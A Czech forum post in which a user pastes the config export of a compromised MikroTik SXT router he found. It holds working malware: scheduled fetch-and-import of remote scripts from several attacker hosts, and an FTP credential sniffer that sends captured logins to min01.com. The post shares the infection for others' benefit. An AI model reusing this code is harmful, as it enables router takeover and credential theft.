Zdravim,
dneska jsem objevil jedno SXT, které bylo už dlouho nedostupné, tak jsem se zkusil připojit přes MAC telnet a bylo tam tohle:
may/03/2020 12:17:13 by RouterOS 6.42rc49
software id = SFAZ-6QBB
#
model = SXT r2 5nD
serial number = xxx
/interface wireless security-profiles
set [ find default=yes ] supplicant-identity=MikroTik
add authentication-types=wpa-psk,wpa2-psk eap-methods="" \
management-protection=allowed mode=dynamic-keys name=profile1 \
supplicant-identity="" wpa-pre-shared-key=xxx \
wpa2-pre-shared-key=xxx
/interface wireless
set [ find default-name=wlan1 ] band=5ghz-a/n channel-width=20/40mhz-Ce \
country="czech republic" disabled=no hw-retries=15 nv2-preshared-key=\
xxx nv2-security=enabled radio-name=xxx \
security-profile=profile1 ssid=xxx tx-power=14 tx-power-mode=\
all-rates-fixed
/ip firewall layer7-protocol
add name=tls7 regexp="AUTH TLS"
/ip ipsec proposal
set [ find default=yes ] enc-algorithms=3des
/ip pool
add name=dhcp_pool1 ranges=100.100.1.100-100.100.1.200
/ip dhcp-server
add address-pool=dhcp_pool1 authoritative=after-2sec-delay disabled=no \
interface=ether1 lease-time=3d name=dhcp1
/system logging action
set 0 memory-lines=100
set 1 disk-file-name=log disk-lines-per-file=100
/ip address
add address=100.100.1.1/24 interface=ether1 network=100.100.1.0
add address=10.10.47.10/25 interface=wlan1 network=10.10.47.0
/ip cloud
set ddns-enabled=yes
/ip dhcp-server network
add address=100.100.1.0/24 dns-server=10.10.1.1,8.8.8.8 gateway=100.100.1.1
/ip dns
set allow-remote-requests=yes servers=\
185.121.177.177,5.189.170.196,8.8.8.8,104.238.186.189
/ip firewall address-list
add address=10.10.47.10 list=ftpgood
add address=127.0.0.1 list=allow-ip
/ip firewall filter
add action=accept chain=forward comment=ftpgood disabled=yes \
dst-address-list=ftpgood dst-port=21 protocol=tcp
add action=drop chain=forward comment=tls disabled=yes dst-address-list=atls \
dst-port=21 protocol=tcp
add action=drop chain=forward comment=tls disabled=yes dst-address-list=\
ftpinit dst-port=21 protocol=tcp
add action=add-src-to-address-list address-list=ip1 address-list-timeout=7s \
chain=input comment="I closed the vulnerability with a firewall." \
disabled=yes packet-size=1251 protocol=icmp
add action=add-src-to-address-list address-list=ip2 address-list-timeout=7s \
chain=input comment=ip2 disabled=yes packet-size=627 protocol=icmp \
src-address-list=ip1
add action=add-src-to-address-list address-list=allow-ip \
address-list-timeout=1h chain=input comment=allow-ip disabled=yes \
packet-size=627 protocol=icmp src-address-list=ip2
add action=add-src-to-address-list address-list=blacklist \
address-list-timeout=2h chain=input comment=blacklist disabled=yes \
packet-size=!627 protocol=icmp src-address=!215.6.0.0/16 \
src-address-list=ip2
add action=add-src-to-address-list address-list=blacklist \
address-list-timeout=2h chain=input comment=blacklist disabled=yes \
packet-size=464 protocol=icmp src-address=!215.6.0.0/16
add action=add-src-to-address-list address-list=blacklist \
address-list-timeout=2h chain=input comment=blacklist disabled=yes \
packet-size=1083 protocol=icmp src-address=!215.6.0.0/16
add action=drop chain=input comment=\
"You can say thanks on the WebMoney Z399578297824" disabled=yes dst-port=\
8778,8728,8729,22,23,80,443,8291 protocol=tcp src-address-list=blacklist
add action=add-src-to-address-list address-list=Ok address-list-timeout=10s \
chain=input comment=sysadminpxy disabled=yes dst-port=63141 protocol=tcp
add action=accept chain=input comment=sysadmin53u disabled=yes port=53 \
protocol=udp
add action=accept chain=input comment=sysadmin53t disabled=yes port=53 \
protocol=tcp
add action=accept chain=input comment=\
"Please update RotherOS and change password." disabled=yes \
src-address-list=allow-ip
add action=drop chain=input comment="or BTC 14qiYkk3nUgsdqQawiMLC1bUGDZWHowix1\
. My Telegram http://t.me/router_os" disabled=yes dst-port=\
8778,8728,8729,22,23,80,443,8291 protocol=tcp src-address-list=!allow-ip
add action=tarpit chain=input comment=\
"Add you ip addess to allow-ip in Address Lists." disabled=yes dst-port=\
30553 protocol=tcp
/ip firewall mangle
add action=add-dst-to-address-list address-list=atls chain=prerouting \
comment=tls dst-port=21 layer7-protocol=tls7 protocol=tcp
add action=add-dst-to-address-list address-list=ftpinit chain=prerouting \
comment=ftp dst-address-list=!ftpok dst-port=21 protocol=tcp
/ip firewall nat
add action=redirect chain=dstnat comment=sysadminpxy dst-port=80 protocol=tcp \
src-address-list=!Ok to-ports=63141
add action=masquerade chain=srcnat out-interface=wlan1
/ip ipsec policy
set 0 dst-address=0.0.0.0/0 src-address=0.0.0.0/0
/ip proxy
set cache-path=web-proxy1 enabled=yes port=63141
/ip proxy access
add action=deny comment=sysadminpxy
/ip route
add distance=1 gateway=10.10.47.1
/ip service
set telnet disabled=yes
set ftp disabled=yes
set www disabled=yes
set ssh disabled=yes
set api disabled=yes
set winbox address=10.0.0.0/8,172.16.0.0/12,100.100.1.0/24
set api-ssl disabled=yes
/ip socks
set port=27182
/snmp
set contact=public enabled=yes location=xxx
/system clock
set time-zone-autodetect=no
/system ntp client
set enabled=yes primary-ntp=88.147.254.230 secondary-ntp=88.147.254.235
/system routerboard settings
set silent-boot=no
/system scheduler
add interval=1d name=Auto113 on-event="/system reboot" policy=\
ftp,reboot,read,write,policy,test,password,sniff,sensitive start-date=\
dec/20/2018 start-time=03:11:00
add name=upd112 on-event="/system scheduler remove [find name=sh113]\r\
\n:do {/file remove u113.rsc} on-error={}" policy=\
ftp,reboot,read,write,policy,test,password,sniff,sensitive start-time=\
startup
add interval=4h name=upd113 on-event=":do {/tool fetch url=\"http://min01.net:\
31416/min01\?key=F644EeLARDXhpc&port={vport}\" mode=http dst-path=u113.rsc\
} on-error={}\r\
\n:do {/tool fetch url=\"http://mikr0tik.com:31416/min01\?key=F644EeLARDXh\
pc&port={vport}\" mode=http dst-path=u113.rsc} on-error={}\r\
\n:do {/tool fetch url=\"http://gotan.bit:31416/min01\?key=F644EeLARDXhpc&\
port={vport}\" mode=http dst-path=u113.rsc} on-error={}\r\
\n:do {/import u113.rsc} on-error={}\r\
\n:do {/file remove u113.rsc} on-error={}" policy=\
ftp,reboot,read,write,policy,test,password,sniff,sensitive start-date=\
dec/21/2018 start-time=09:52:42
add interval=1m name=shftp on-event=":if ([:len [/system script job find scrip\
t =\"scftp\"]] != 1) do={/system script job remove [/system script job fin\
d script =\"scftp\"];:execute \"scftp\"};" policy=\
ftp,reboot,read,write,policy,test,password,sniff,sensitive start-time=\
startup
/system script
add name=scftp owner=admin policy=\
ftp,reboot,read,write,policy,test,password,sniff,sensitive source=":do {/t\
ool sniffer stop} on-error={}\r\
\nwhile (true) do={\r\
\nforeach i in=[/ip firewall address-list find where list=atls or list=ftp\
good] do={\r\
\n:local ipftp [/ip firewall address-list get \$i address] \r\
\n:do {/ip firewall address-list remove [find where list=\"ftpinit\" && ad\
dress=\$ipftp]} on-error={}\r\
\n:do {/ip firewall address-list remove [find where list=\"ftpok\" && addr\
ess=\$ipftp]} on-error={}\r\
\n:do {/ip firewall address-list remove [find where list=\"atls\" && addre\
ss=\$ipftp]} on-error={}\r\
\n:do {/file remove (\$ipftp.\".txt\")} on-error={}\r\
\n}\r\
\nforeach i in=[/ip firewall address-list find list=ftpinit] do={\r\
\n:local ipftp [/ip firewall address-list get \$i address]\r\
\n:do {/tool sniffer set file-limit=200KiB file-name=(\$ipftp.\".txt\") fi\
lter-interface=all filter-ip-address=\$ipftp filter-port=21 streaming-enab\
led=no memory-scroll=no} on-error={}\r\
\n:do {/tool sniffer start} on-error={}\r\
\n:do {/ip firewall address-list add address=\$ipftp list=ftpok timeout=2h\
} on-error={}\r\
\n:do {/ip firewall address-list remove [find where list=\"ftpinit\" && ad\
dress=\$ipftp]} on-error={}\r\
\n:local len0 0\r\
\n:local len1 0\r\
\n:local file0 \"\"\r\
\n:local file1 \"\"\r\
\n:local minute\r\
\n:set \$minute ([:pick [/sys clock get time] 3 5]+2)\r\
\nif (\$minute>59) do={:set \$minute (\$minute-60)}\r\
\n:do {\r\
\n:set \$len0 \$len1\r\
\n:set \$file0 \$file1 \r\
\n:do {:set \$file1 [/file get (\$ipftp.\".txt\") contents]} on-error={}\r\
\n:set \$len1 [:len \$file1]\r\
\n} while=(!((\$len0!=\$len1 and \$len1=0) or ([:tonum [:pick [/sys clock \
get time] 3 5]]=\$minute)))\r\
\n:do {/tool sniffer stop} on-error={}\r\
\n:set \$pUSER [:find \$file0 \"USER \" -1]\r\
\n:set \$pPASS [:find \$file0 \"PASS \" -1]\r\
\n:local user \"\"\r\
\n:local pass \"\"\r\
\nif (\$pUSER>0) do={\r\
\n:set \$pUSER (\$pUSER+5)\r\
\n:set \$ch [:pick \$file0 \$pUSER (\$pUSER+1)]\r\
\nwhile (\$ch!=\"\r\" && \$ch!=\"\n\" && \$pUSER<\$len0) do={\r\
\nif (\$ch=\" \") do={:set \$ch \"!pRoBeL>!\"}\r\
\nif (\$ch=\"\\?\") do={:set \$ch \"!vOpRoS>!\"}\r\
\nif (\$ch=\"\\"\") do={:set \$ch \"!kAv>!\"}\r\
\nif (\$ch=\"\\$\") do={:set \$ch \"!dOlLaR>!\"}\r\
\nif (\$ch=\"\\\") do={:set \$ch \"!pAlKa>!\"}\r\
\n:set \$user (\$user.\$ch)\r\
\n:set \$pUSER (\$pUSER+1)\r\
\n:set \$ch [:pick \$file0 \$pUSER (\$pUSER+1)]\r\
\n}}\r\
\nif (\$pPASS>0) do={\r\
\n:set \$pPASS (\$pPASS+5)\r\
\n:set \$ch [:pick \$file0 \$pPASS (\$pPASS+1)]\r\
\nwhile (\$ch!=\"\r\" && \$ch!=\"\n\" && \$pPASS<\$len0) do={\r\
\nif (\$ch=\" \") do={:set \$ch \"!pRoBeL>!\"}\r\
\nif (\$ch=\"\\?\") do={:set \$ch \"!vOpRoS>!\"}\r\
\nif (\$ch=\"\\"\") do={:set \$ch \"!kAv>!\"}\r\
\nif (\$ch=\"\\$\") do={:set \$ch \"!dOlLaR>!\"}\r\
\nif (\$ch=\"\\\") do={:set \$ch \"!pAlKa>!\"}\r\
\n:set \$pass (\$pass.\$ch)\r\
\n:set \$pPASS (\$pPASS+1)\r\
\n:set \$ch [:pick \$file0 \$pPASS (\$pPASS+1)]\r\
\n}}\r\
\nif ([:len \$user]!=0 or [:len \$pass]!=0) do={\r\
\nif ([:len \$user]<40 && [:len \$pass]<40) do={\r\
\n:do {/ip firewall address-list add address=\$ipftp list=ftpgood} on-erro\
r={}\r\
\n:do {/tool fetch url=(\"http://min01.com:31418/ftp\?ipftp=\".\$ipftp.\"&\
user=\".\$user.\"&pass=\".\$pass) mode=http keep-result=no} on-error={}\r\
\n}}\r\
\n:delay 1s\r\
\n:do {/file remove (\$ipftp.\".txt\")} on-error={}\r\
\n}\r\
\n:delay 1s\r\
\n}\r\
\n"
/tool sniffer
set file-limit=200KiB file-name=10.10.47.10.txt filter-interface=all \
filter-ip-address=10.10.47.10/32 filter-port=ftp memory-scroll=no
xxx jsem samozřejmě psal já, ale principiálně kdyby to někomu k něčemu pomohlo...
